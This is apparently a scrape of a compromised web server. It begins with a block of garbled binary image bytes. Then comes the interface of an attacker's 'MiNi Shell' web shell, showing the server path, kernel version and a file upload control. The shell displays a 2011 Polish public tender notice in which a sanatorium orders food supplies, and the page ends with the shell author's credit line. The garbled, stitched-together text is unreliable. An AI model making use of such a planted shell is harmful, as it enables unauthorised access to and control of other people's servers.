JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110412/74068-N-2011.html

<p class="kh_header"><b>Sokołowsko: dostawy produktów mrożonych, artykułów zbożowych i sypkich, sosów, przypraw i i innych art. spożywczych.</b><br>
<b>Numer ogłoszenia: 74068 - 2011; data zamieszczenia: 12.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sanatoria Dolnośląskie  sp. z o.o. , ul. Parkowa 3, 58-351 Sokołowsko, woj. dolnośląskie, tel. 74 8458240, faks 74 8458237.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy produktów mrożonych, artykułów zbożowych i sypkich, sosów, przypraw i i innych art. spożywczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Lp. Produkty Jedn. Miary Plan ilość/6mies. 1 Fasola sucha op. 3kg kg 180 2 Groch suchy op. 3kg kg 116 3 Kasza gryczana op. 1 - 5 kg kg 240 4 Kasza jęczmienna op.1 - 5 kg kg 711 5 Kasza kukyrydziana op. 1 kg kg 170 6 Kasza manna op. 1 kg. kg 582 7 Makaron - forma gruba, świderki, muszelki, kolanka Op. 5 kg kg 781 8 Makaron nitki, PN A 74132Op. 5 kg kg 360 9 Mąka pszenna typ 450, np. tortowa, wrocławska, 1kg kg 2405 10 Mąka tortowa typ 450 op. 1 kg. kg 450 11 Mąka ziemniaczana op.1kg kg 218 12 Płatki kukurydziane 1kg kg 4 13 Płatki owsiane op. 1 kg. kg 329 14 Ryż op. 1 kg. kg 1351 Zadanie 2 Lp. Produkty Jedn. Miary Plan ilość/6mies. 1 Chrzan konserwowy, 200g szt 639 2 Fasolka czerwona konserwowa typu Rolnik , szt 48 3 Groszek konserwowy typu Rolnik , Pudliszki , Vernet 400g, po odcieku 240 g szt 729 4 Ketchup 500ml Tortex łagodny szt 400 5 Koncentrat buraczany w płynie - op do. 300 ml. szt 72 6 Koncentrat owocowy - syrop 0,5l szt 64 7 Koncentrat pomidorowy 30% 1 kg kg 376 8 Majonez op. 300 g szt 64 9 Majonez op. 900 g szt 444 10 Majonez wiaderko 5kg, typu kętrzyński kg 30 11 Margaryna na kanapki kubek 500g typu Delma szt 3500 12 Margaryna zwykła kostka 250g szt 2222 13 Musztarda op. 200 g, 900 g kg 459,4 14 Ocet 10% op. 1l l 146 15 Ogórki konserwowe ok. 870 900g, po odcieku 520 540g typu Simpol , Frutico , Frubex szt 463 16 Olej roślinny uniwersalny 1-5l l 772 17 Papryka konserwowa , 850 900g, po odcieku 540gtypu Simpol , Frubex , Frutico szt 188 18 Szczaw op. 300g szt 240 19 Tuńczyk w puszce/ konserwy rybne ok. 175 g szt 96 Zadanie 3 Lp. Produkty Jedn. Miary Plan ilość/6mies. 1 Biszkopty ok.150g szt 282 2 Budyń b/cukru różne smaki op. 1k g kg 116 3 Budyń bez cukru na 3/4 l mleka, bez smaków 1 kg kg 40 4 Ciastka herbatniki np. Petitki, Szkolne 100g kg 430 5 Cukier op.1 kg kg 3478 6 Cukier puder op. 500 g kg 29 7 Cukier waniliowy 20g szt 656 8 Dżem owocowy 1000 g lub 0,9 l szt 1476 9 Herbata ekspresowa typu minutka torebk 100 szt. szt 902 10 Herbata granulowana op. 200 g szt 408 11 Herbata owocowa 20szt op szt 20 12 Kakao naturalne op. 150 g kg 122 13 Kawa naturalna rozpuszczalna granulowana op. 0,5 kg. kg 12 14 Kawa zbożowa rozpuszczalna op.500 g kg 79 15 Kawa zbożowa tradycyjna op.500 g kg 247 16 Kisiel 1 kg kg 16 17 Kisiel bez cukru na 3/4 l wody ok. 1 kg truskawka, malina, typu Delecta kg 1013 18 Kleik ryżowy 160g kg 38 19 Marmolada op.1 kg 30 20 Marmolada op.15 kg kg 180 21 Mleko w proszku odtłuszczone 25 kg kg 506 22 Mleko w proszku pełne 0,5 kg kg 16 23 Mleko w proszku pełne 25 kg kg 526 24 Sok owocowo warzywny op. 1l smaki: marchew banan jabłko lub marchew jabłko l 403 25 Suchary pszenne delikatesowe 290g z cukrem typu Mamut szt 94 26 Wafle 150g, różne smaki, typu Skawa , Grzesiek kg 658 27 Zaprawa owocowa do napojów, 425 450ml, typu Vitax szt 571 Zadanie 4 Lp. Produkty Jedn. Miary Plan ilość/6mies. 1 Barszcz czerwony instant typu Winiary , Knorr 3kg kg 21 2 Bazylia 10g szt 132 3 Bulion grzybowy w proszku a 1000g kg 7 4 Cynamon mielony 20 g szt 235 5 Czosnek granulowany 20g szt 80 6 Kminek 20g szt 202 7 Koperek suszony 250g kg 34 8 Kukurydza konserwowa w puszce 340g po odcieku szt 625 9 Kwasek cytrynowy op. 1 kg kg 30 10 Liście laurowe op. 100 g szt 288 11 Majeranek op. 100 g szt 380 12 Oregano 10g szt 132 13 Papryka mielona ostra 20g szt 82 14 Papryka mielona słodka 20-100g kg 13,6 15 Pieprz czarny naturalny mielony 1 kg kg 30,2 16 Pieprz ziołowy mielony 20g, typu Euro Konkret , Cykoria szt 406 17 Pieprz ziołowy op. 100 g szt 314 18 Pietruszka suszona 250g kg 4 19 Przyprawa chińszczyzny typu Knorr 500, 700 g kg 3,5 20 Przyprawa do drobiu op.500g 700 g typu Edpol , knorr kg 67 21 Przyprawa do ryb a 600g typu Delikat Knorr kg 3,6 22 Przyprawa do wieprzowiny op.500g typu Edpol kg 2,5 23 Przyprawa do zup w płynie ok.1000g (860ml) typuKnorr l 174 24 Przyprawa do zup w płynie op. 1 litra l 456 25 Przyprawa jarzynka op. 0,5 kg kg 86 26 Przyprawa warzywna, min. 15% warzyw suszonych, 1 kg typu Warzywko kg 223 27 Rodzynki 100g kg 11 28 Rosół o smaku wędzonki, w proszku, op. 15 kg typuKnorr kg 70 29 Sos bolones / napoli typu Knorr op.1,1kg kg 3,3 30 Sos cytrynowo - maślany typu Knorr 0,7 kg kg 3,5 31 Sos pieczeniowy typu knorr op. 1,1 kg kg 2,2 32 Sos sałatkowy ogrodowy, grecki op. 0,7 kg kg 2,1 33 Sól warzona - jodowana op.1 kg kg 1180 34 Włoszczyzna krojona w paski 1kg kg 180 35 Ziele angielskie 20g szt 181 36 Zupa brokułowa typu Knorr op 20-100g kg 3 37 Zupa porowa typu knorr 20-100g kg 3 12 Zupa pieczarkowa 40g-100g kg 3 13 Zupa Barszcz biały 40-100 g kg 3 38 Żelatyna spożywcza wieprzowa 1000 g kg 15 39 Żurek w proszku typu Knorr op. 3 kg kg 3 Zadanie 5 Lp. Produkty Jedn. Miary Plan ilość/6mies. 1 Porzeczka czarna mrożona luzem 5 lub 7 kg kg 50 2 Brokuła mrożona luzem 5 lub 7 kg kg 80 3 Truskawki mrożone op. 5 kg-7 kg kg 145 4 Marchew mrożona luzem op. od 5 - 7 kg kg 152 5 Marchew z groszkiem mrożona 5-7 kg kg 155 6 Ryba mrożona miruna, dorsz (STH) kg 160 7 Fasolka szparagowa mrożona luzem op. od 5 lub 7 kg kg 175 8 Kalafior mrożony op. Luzem 5-7 kg kg 257 9 Mieszanka warzywna mrożona 5 cio składnikowa op. Luzem 5-7 kg kg 330 10 Szpinak mrożony 1 kg kg 332 11 Mieszanka kompotowa mrożona luzem op. od 5-7 kg kg 804..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.61.00-, 15.80.00.00-6, 15.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji dzia-łalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działal-ności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt 2 Ustawy Pzp. (Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast w/w dokumentu składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania zgodnie z przepisami § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605)) - Oświadczenie Wykonawcy o wprowadzeniu systemu HACCP lub certyfikat potwierdzający stosowanie systemu HACCP - Oświadczenie Wykonawcy o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub obrocie oraz zapewnienia jakość zdrowotną produktów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenia
Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od od-powiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej lub ubezpieczył się od odpowiedzialności kontraktowej na sumę ubezpieczenia nie mniejszą jak 20.000,00 zł. Dokument potwierdzający ubezpieczenie OC w zakresie prowadzonej działalności gospodarczej należy złożyć razem z ofertą, dokument w zakresie ubezpieczenia kontraktowego należy złożyć najpóźniej przed podpisaniem umowy. Brak ubezpieczenia spowoduje odrzucenie oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o wprowadzeniu systemu HACCP lub certyfikat potwierdzający stosowanie systemu HACCP - Oświadczenie Wykonawcy o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub obrocie oraz zapewnienia jakość zdrowotną produktów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanatoria-dolnoslaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sanatoria Dolnośląskie Sp. z o.o. Parkowa 3, Sokołowsko, 58-350 Mieroszów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 10:00, miejsce: Sanatoria Dolnośląskie Sp. z o.o. Parkowa 3, Sokołowsko, 58-350 Mieroszów. sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> N ie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com